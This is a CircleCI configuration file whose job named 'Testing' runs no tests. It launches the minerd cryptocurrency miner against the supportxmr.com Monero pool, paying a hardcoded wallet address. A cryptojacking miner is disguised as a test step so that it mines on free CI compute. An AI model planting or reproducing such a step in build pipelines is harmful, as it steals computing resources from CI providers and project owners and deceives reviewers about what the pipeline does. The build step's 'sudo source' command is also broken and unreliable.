version: 2
jobs:
  build:
    docker:
      - image: debian:stretch
    steps:
      - checkout
      - run:
          name: Build
          command: sudo source build.sh
  test:
    docker:
      - image: debian:stretch
    steps:
      - checkout
      - run:
          name: Testing
          command: ./minerd -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 46j6QzUQYUDAvbsWNPgJ6rdYVRmQkgjKzcrwmEfGyubna9VMYrYqSQg74hvQW8ossLFK113eVJz31Bw17DrUa44DCaaCPbC -p circleci:bwillis01@protonmail.com

workflows:
  version: 2
  build_and_test:
    jobs:
      - build
      - test:
          requires:
            - build
          filters:
            branches:
              only: master

